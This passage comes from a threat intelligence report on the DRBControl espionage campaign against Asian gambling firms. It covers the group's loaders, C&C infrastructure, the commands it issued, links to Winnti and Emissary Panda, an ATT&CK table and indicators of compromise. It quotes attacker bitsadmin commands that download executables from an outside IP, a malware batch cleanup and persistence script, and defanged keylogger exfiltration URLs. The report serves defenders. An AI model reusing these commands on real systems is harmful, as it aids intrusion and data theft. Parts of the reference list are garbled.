Many of the tools used were simple code loaders, which DRBControl might use to bypass code execution restrictions or evade security solutions. One of them takes a hostname and a port as parameters, connects to that server, downloads code (probably position-independent shellcode), and executes it. Another tool, named NetUseEngine according to its PDB information, creates a service and launches it at system boot; it takes one of three parameters: install, special, or uninstall. The malicious actor also wrote a tool that runs a command by writing it into a run.sct scriptlet and executing it via the Squiblydoo technique (regsvr32.exe loading the scriptlet through scrobj.dll).[22] Others are even simpler, launching c:\programdata\b.bat via WinExec or CreateProcessA. We even found a b.bat file launching Mimikatz.

## Infrastructure Analysis

There were not many domain names linked to DRBControl, and the infrastructure was diverse. In most cases, we could resolve IP addresses only for the subdomains hardcoded in the malware samples; the parent domain names themselves had no IP addresses linked to them. On multiple occasions, different subdomains led to different malware families. The attacker also pointed some domain names to 127.0.0.1, a known practice of some threat actors. More recently, the attacker switched to IP addresses that, based on Whois records, fall within the Google Cloud address space. (It should be noted, however, that this does not necessarily mean direct abuse of the platform.)

When browsing the C&C domain names or IP addresses, we noticed that the returned content was a simple HTTP redirect to a legitimate website such as Google or Dropbox.
This is consistent with the malicious domain names, which sometimes contained those company names.

##### Review of DRBControl's Activities

DRBControl's activities can be reviewed based on the commands sent to 67 different victim IDs. The command types observed were: list files, run command, upload file, download file, list drives, delete file, execute file, rename file, and copy file.

Figure 16. Command types sent by DRBControl

| Command | Number of occurrences |
|---|---|
| netstat -ano | 24 |
| tasklist | 19 |
| systeminfo | 19 |
| query user | 18 |
| ipconfig /all | 16 |
| whoami | 15 |
| reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" | 12 |
| dir wlbsctrl.dll | 11 |
| type log.txt | 10 |
| set | 10 |

Table 1. Top 10 commands issued by DRBControl through "cmd /c"

Nearly all of these are host and network discovery. The reg query of the Terminal Server Client\Default key lists the hosts the current user recently connected to over RDP, a ready-made list of lateral movement targets, and "dir wlbsctrl.dll" checks whether the side-loaded IKEEXT DLL described earlier is already in place.

Of the 51 files that the attacker deleted, the majority were post-exploitation tools. Notably, in two cases, the attacker deleted the file c:\ProgramData\SxS\NvSmart.hlp, which is known to contain keylogging data generated by the PlugX malware. All of the downloaded files were post-exploitation tools. Among the uploaded files were many Office and PDF documents, key logs, SQL dumps, browser cookies, and even a KeePass database.

Another interesting detail is that the download and upload commands included the remote file path as an argument, which allowed us to see how the attacker organizes its files. Some of the parent directories on the attacker's side were telling: "C:\Projects\Dropbox\Test Version\DRBControl\Release\Downloads\" and "C:\Users\Win2008_x64\Desktop\drb\Downloads\". The attacker would then create a directory structure of "[ ]\[ ]+[ ]\" or "()\". Some of the attacker's directory names contained Chinese words, such as "备份" ("backup") and "UAC 提权" ("UAC elevation").
## Links with Known Threat Actors

Our first assumption was that this attacker was new, as we had never seen the type 1 and type 2 backdoors before and did not find infrastructure overlaps with other threat actors. However, our analysis revealed some connections to known threat actors, listed below.

##### Winnti

Aside from being motivated by profit, the Winnti group has gained notoriety for its involvement in various targeted attacks and for using self-developed, technically proficient tools.[23] Over the years, Winnti-related activities have suggested that there is likely more than one group of attackers behind the Winnti umbrella.[24] It is highly probable that Winnti comprises several closely related threat actors that share tools and parts of their attack infrastructure. How closely they work together is still unknown: some speculate that there is one central development group providing malware and tools to the others, or that each entity creates its own software and later shares it with peers.

The first link we found was the mutexes shared between two malware families with different infrastructure. One of the Trochilus samples, named diskshawin.exe, had links to the domain name fn.shopingchina[.]net and is dropped by a custom installer that uses the following mutexes:

- cc5d64b344700e403e2sse
- cc5d6b4700e403e2sse
- cc5d6b4700032eSS

The same mutexes were found in a BbsRat sample named diskwinshadow.exe, which contacts the domain name bot.googlerenewals[.]net.
The same domain name has been listed in a 2017 ClearSky report on the Winnti group’s activities.[25]

-----

The second and third links we found come from two commands issued by the attacker on a compromised machine:

- bitsadmin /transfer n http://185.173.92[.]141:33579/i610.exe c:\users\public\wget.exe
- bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe c:\users\public\wget.exe

A look into the passive DNS of the IP address 185.173.92[.]141 revealed that the domain name asia.googlerenewals[.]net was used close to the timeline of our incident. Finally, we searched for executables named t32d.exe and found a sandbox report for a malware sample contacting the domain name test3.facebooknavigation[.]com. Like googlerenewals[.]net, facebooknavigation[.]com was also listed as Winnti-related in the aforementioned report.

##### Emissary Panda/LuckyMouse/APT 27

We also found some links with Emissary Panda (a.k.a. LuckyMouse, APT27, and Iron Tiger). The first one involves the use of the HyperBro backdoor, which appears to be exclusive to the threat actor. All reports we found on this backdoor mention campaigns attributed to Emissary Panda.[26, 27] While it is a very loose link, we also noticed that the packed version of HyperBro was named thumb.db in the Emissary Panda case, while the one in this campaign is named thumb.dat. The executable used for DLL side-loading, however, is entirely different.

Having found relations with Winnti and Emissary Panda reminded us that we had also found some signed malware certificates being shared by both groups in the past.

-----

## Conclusion

Attribution is a complicated aspect of cybersecurity, and it is not the goal of this publication. What we have discovered in our analysis, however, is the existence of a significant number of indicators of compromise (IoCs) and intriguing connections with at least two known APT groups.
This research delves into the modus operandi and different kinds of malware used by DRBControl, whose goal is to steal source code and data from gambling and betting companies located in Asia. We did not find information regarding attacks in other parts of the world. However, this is not to say that there have been none. The threat actor described here shows solid and quick development capabilities regarding the custom malware used, which appears to be exclusive to them. The campaign shows that once an attacker gains a foothold in the targeted entity, the use of public tools can be enough to elevate privileges, perform lateral movement in the network, and exfiltrate data.

###### Trend Micro Solutions

Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to today’s stealthy malware and targeted attacks in real time through specialized engines,[28] custom sandboxing,[29] and seamless correlation across the entire attack lifecycle, even without any engine or pattern update. To defend against spam and email threats,[30] businesses can consider Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites[31] and Worry-Free™ Business Security.[32] Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs.[33] Trend Micro™ Deep Security™ and Vulnerability Protection provide virtual patching that protects endpoints from threats that abuse unpatched vulnerabilities.[34, 35] Trend Micro’s suite of security solutions is powered by XGen™ security,[36] which features high-fidelity machine learning to secure the gateway and endpoint data and applications.[37] XGen™ protects against today’s purpose-built threats that bypass traditional controls, exploit known, unknown, or undisclosed vulnerabilities, and either steal or encrypt personally identifiable data.
-----

###### MITRE ATT&CK Matrix™

|Tactic|Techniques|
|---|---|
|Initial Access|Spearphishing Attachment|
|Execution|Command-Line Interface; Execution through API; Execution through Module Load; Exploitation for Client Execution; PowerShell; Scripting; Service Execution; Signed Binary Proxy Execution; User Execution; Windows Management Instrumentation|
|Persistence|BITS Jobs; DLL Search Order Hijacking; Hidden Files and Directories; New Service; Redundant Access; Registry Run Keys / Startup Folder|
|Privilege Escalation|Access Token Manipulation; Bypass User Account Control; DLL Search Order Hijacking; Exploitation for Privilege Escalation; New Service; Process Injection|
|Defense Evasion|Access Token Manipulation; BITS Jobs; Bypass User Account Control; Connection Proxy; Deobfuscate/Decode Files or Information; DLL Search Order Hijacking; DLL Side-Loading; File Deletion; Hidden Files and Directories; Masquerading; Modify Registry; Obfuscated Files or Information; Process Hollowing; Process Injection; Redundant Access; Scripting; Signed Binary Proxy Execution; Software Packing; Web Service|
|Credential Access|Brute Force; Credential Dumping; Credentials from Web Browsers; Input Capture|
|Discovery|Account Discovery; Application Window Discovery; File and Directory Discovery; Network Share Discovery; Process Discovery; Query Registry; Remote System Discovery; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Owner/User Discovery; System Service Discovery; System Time Discovery|
|Lateral Movement|Remote File Copy|
|Collection|Clipboard Data; Data from Local System; Data from Network Shared Drive; Input Capture; Screen Capture|
|Command And Control|Commonly Used Port; Connection Proxy; Custom Command and Control Protocol; Custom Cryptographic Protocol; Data Obfuscation; Fallback Channels; Multi-Stage Channels; Multilayer Encryption; Remote File Copy; Standard Application Layer Protocol; Uncommonly Used Port; Web Service|
|Exfiltration|Exfiltration Over Alternative Protocol|
-----

##### Indicators of Compromise (IoCs)

###### Payload

###### Spear-Phishing Documents

###### Type 0

|SHA-256|Trend Micro Pattern Detection|
|---|---|
|5aee7ae5dd28fcd7e672912292061022c29538bf9264db56b30efdbc8d45abc0|Trojan.Win32.CLAMBLING.A|
|d5e98fb0f05f28183f51a66b0032525ebedc55f056c0ddff2bf15a5eb3016fdd|Trojan.Win32.CLAMBLING.A|

##### Type 1 backdoor samples

###### Dropper

|SHA-256|Trend Micro Pattern Detection|
|---|---|
|0aa627736df73c543c26c3f033f1962282dd005e6a0ec8d9357df3511b2fc8a6|Trojan.Win64.CLAMBLING.A|
|52c02e9d24913761f508b0be1604b357acbe73c65df410b5588eef0e14cf812f|Trojan.Win64.CLAMBLING.A|
|d4d8a8cd8da49c7ae974d6774458d6267463eb62e798ced51865e7f88a64969e|Trojan.Win64.CLAMBLING.A|

###### Type 1

###### Type 2 backdoor samples

###### Type 3

###### Dropbox uploader

###### PlugX RAT

###### Trochilus RAT

Batch script related to Trochilus RAT contains the following commands:

```bat
echo �������
attrib -H -S c:\windows\fonts\system.exe
sc delete SESSRV
taskkill /f /im system.exe
taskkill /f /im system.exe
del /f /q c:\windows\fonts\system.exe
del /f /q c:\windows\fonts\system.exe
del /f /q c:\windows\fonts\run.bat
pushd c:
md \ProgramData\Microsoft\DeviceSync
move /y c:\windows\fonts\diskshawin.exe c:\ProgramData\Microsoft\DeviceSync
move /y c:\windows\fonts\diskshawin.exe %allusersprofile%\Microsoft\DeviceSync
cacls c:\windows\fonts\clip.exe /e /c /g everyone:f
attrib +H +S c:\windows\fonts\clip.exe
start csres.exe”
del %sfxcmd%
del %0
```

###### HyperBro

|SHA-256|Name|Trend Micro Pattern Detection|
|---|---|---|
|b823c03be8959b7636997616811ed69b2d611b8505b4f06958c7dc430e3cd681|thumb.dat|Backdoor.Win32.HYPERBRO.ENC|

###### Winnti

- googlerenewals[.]net
- facebooknavigation[.]com

###### MFC keyloggers

Malware related to the use of the Microsoft Foundation Class (MFC) library captures clipboard and keystroke data and sends the information to two different PHP scripts hosted on the C&C: hxxp://jqb.shopingchina[.]net:88/index.php and hxxp://jqb.shopingchina[.]net:88/mobile.php?pw=666.

|SHA-256|Trend Micro Pattern Detection|
|---|---|
|ae4b9dd3709e4e5e30ce62e7e4075f366f38676e2bad165da3ab4690251e70ae|Trojan.Win32.FLYSTUDIO.D|
|5da3811c4f15d04444d4c3721e7cc9be106bb1fe2b1bc95c3fe09d991df2a5e8|Trojan.Win32.FLYSTUDIO.D|

###### Cobalt Strike

|SHA-256|Trend Micro Pattern Detection|
|---|---|
|91ccf1148f8573a8ef74e9f65c330e8f1f5fe67dc33b99f30e0d3fed69f3d0f0|Trojan.Win32.ROZENA.AM|

###### Post-exploitation tools

###### Other malicious domains and IP addresses

-----

##### References

1 Daniel Lunghi and Jaromir Horejsi. (10 June 2019). Trend Micro.
“MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools.” Last accessed on 20 January 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/.

2 Feike Hacquebord. (12 January 2018). Trend Micro. “Update on Pawn Storm: New Targets and Politically Motivated Campaigns.” Last accessed on 20 January 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-storm-new-targets-politically-motivated-campaigns/.

3 The MITRE Corporation. (n.d.). MITRE ATT&CK. “DLL Side-Loading.” Last accessed on 20 January 2020 at https://attack.mitre.org/techniques/T1073/.

4 Dwight Hohnstein. (18 April 2019). SpecterOps. “Lateral Movement — SCM and DLL Hijacking Primer.” Last accessed on 20 January 2020 at https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992.

5 Clément Labro. (5 October 2018). GitHub, Inc. “Windows IKEEXT DLL Hijacking Exploit Tool.” Last accessed on 22 January 2020 at https://github.com/itm4n/Ikeext-Privesc.

6 ImmuniWeb. (8 October 2012). ImmuniWeb. “Privilege Escalation Vulnerability in Microsoft Windows.” Last accessed on 23 January 2020 at https://www.immuniweb.com/advisory/HTB23108.

7 Lawrence Abrams. (15 November 2016). Bleeping Computer. “CryptoLuck Ransomware being Malvertised via RIG-E Exploit Kits.” Last accessed on 23 January 2020 at https://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/.

8 ThreatRecon Team. (25 July 2019). NSHC RedAlert Labs. “The Growth of SectorF01 Group’s Cyber Espionage Activities.” Last accessed on 23 January 2020 at https://threatrecon.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/.

9 Microsoft Corporation. (February 2015). Microsoft. “Cumulative Security Update for Internet Explorer 11 for Windows 7 for x64-based Systems (KB3021952).” Last accessed on 20 January 2020 at https://www.microsoft.com/en-US/download/details.aspx?id=45761.

10 Trend Micro. (16 October 2019). Trend Micro Security News. “Winnti Group Resurfaces with PortReuse Backdoor, Now Engages in Illicit Cryptocurrency Mining.” Last accessed on 20 January 2020 at https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/winnti-group-resurfaces-with-portreuse-backdoor-now-engages-in-illicit-cryptocurrency-mining.

11 The MITRE Corporation. (n.d.). MITRE ATT&CK. “HyperBro.” Last accessed on 20 January 2020 at https://attack.mitre.org/software/S0398/.

12 Robert Falcone. (28 May 2019). Palo Alto Networks, Inc. “Emissary Panda Attacks Middle East Government Sharepoint Servers.” Last accessed on 20 January 2020 at https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/.

13 Rootkiter. (3 January 2019). GitHub, Inc. “Tool for tunnel.” Last accessed on 20 January 2020 at https://github.com/rootkiter/EarthWorm.

14 My IP. (n.d.). My IP. Last accessed on 20 January 2020 at http://myip.com.tw/.

15 MDSec Research. (7 December 2016). GitHub, Inc. “Invoke-CredHunter.ps1.” Last accessed on 20 January 2020 at https://github.com/mdsecresearch/Publications/blob/master/tools/redteam/psh/Invoke-CredHunter.ps1.

16 SecWiki. (31 July 2017). GitHub, Inc. “CVE-2017-0213.cpp.” Last accessed on 20 January 2020 at https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2017-0213/CVE-2017-0213.cpp.

17 BlackYe. (3 May 2014). GitHub, Inc. “ReadPsw.cpp.” Last accessed on 20 January 2020 at https://github.com/blackye/remote_control/blob/master/Server/ReadPsw.cpp.

18 Rapid7. (24 July 2017). GitHub, Inc. “enum_cred_store.rb.” Last accessed on 20 January 2020 at https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_cred_store.rb.

19 Clément Lavoillotte. (15 September 2017). Almond. “UAC bypass via elevated .NET applications.” Last accessed on 20 January 2020 at https://offsec.provadys.com/UAC-bypass-dotnet.html.

20 Rapid7. (28 February 2014). GitHub, Inc. “Win7Elevate_Inject.cpp.” Last accessed on 20 January 2020 at https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp.

21 Matt Nelson. (15 August 2016). enigma0x3. “‘Fileless’ UAC Bypass Using Eventvwr.Exe And Registry Hijacking.” Last accessed on 20 January 2020 at https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/.

22 Russell Nolen, Sarah Miller, and Rico Valdez. (28 April 2016). Carbon Black, Inc. “Threat Advisory: ‘Squiblydoo’ Continues Trend of Attackers Using Native OS Tools to ‘Live off the Land’.” Last accessed on 20 January 2020 at https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/.

23 Trend Micro. (19 April 2017). Trend Micro. “Of Pigs and Malware: Examining a Possible Member of the Winnti Group.” Last accessed on 20 January 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/.

24 Tom Hegel. (3 May 2018). 401TRG. “Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers.” Last accessed on 20 January 2020 at https://401trg.com/burning-umbrella/.

25 ClearSky Research Team. (18 July 2017). ClearSky Cyber Security. “Recent Winnti Infrastructure and Samples.” Last accessed on 20 January 2020 at https://www.clearskysec.com/winnti/.

26 Denis Legezo. (13 June 2018). AO Kaspersky Lab. “LuckyMouse hits national data center to organize country-level waterholing campaign.” Last accessed on 20 January 2020 at https://securelist.com/luckymouse-hits-national-data-center/86083/.

27 Robert Falcone. (28 May 2019). Palo Alto Networks, Inc. “Emissary Panda Attacks Middle East Government Sharepoint Servers.” Last accessed on 20 January 2020 at https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/.

28 Trend Micro Incorporated. (n.d.). Trend Micro. “Advanced Threat Protection.” Last accessed on 6 February 2020 at https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html.

29 Weimen Wu. (20 February 2015). Trend Micro. “Deploying a Smart Sandbox for Unknown Threats and Zero-Day Attacks.” Last accessed on 6 February 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/deploying-a-smart-sandbox-for-unknown-threats-and-zero-day-attacks/.

30 Jon Oliver. (12 July 2018). Trend Micro Security News. “Rising Above Spam and Other Threats via Machine Learning.” Last accessed on 6 February 2020 at https://www.trendmicro.com/vinfo/us/security/news/security-technology/rising-above-spam-and-other-threats-via-machine-learning.

31 Trend Micro Incorporated. (n.d.). Trend Micro. “Smart Protection Suites.” Last accessed on 6 February 2020 at https://www.trendmicro.com/en_us/business/products/user-protection/sps.html.

32 Trend Micro Incorporated. (n.d.). Trend Micro. “Worry-Free Services Advanced.” Last accessed on 6 February 2020 at https://www.trendmicro.com/en_us/small-business/worry-free-services-advanced.html.

33 Trend Micro Incorporated. (n.d.). Trend Micro.
“Advanced Threat Protection.” Last accessed on 6 February 2020 at https://](https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html) [www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html.](https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html) [34 Trend Micro Incorporated. (n.d.). Trend Micro. “Hybrid Cloud Security.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html) [trendmicro.com/en_us/business/products/hybrid-cloud.html.](https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html) [35 Trend Micro Incorporated. (n.d.). Trend Micro. “Smart Protection Suites.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [trendmicro.com/en_us/business/products/user-protection/sps.html.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [36 Trend Micro Incorporated. (n.d.). Trend Micro. “All Solutions.” Last accessed on 6 February 2020 at https://www.trendmicro.](https://www.trendmicro.com/en_us/business/products/all-solutions.html) [com/en_us/business/products/all-solutions.html.](https://www.trendmicro.com/en_us/business/products/all-solutions.html) [37 Trend Micro Incorporated. (n.d.). Trend Micro. “Smart Protection Suites.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [trendmicro.com/en_us/business/products/user-protection/sps.html.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) ----- -----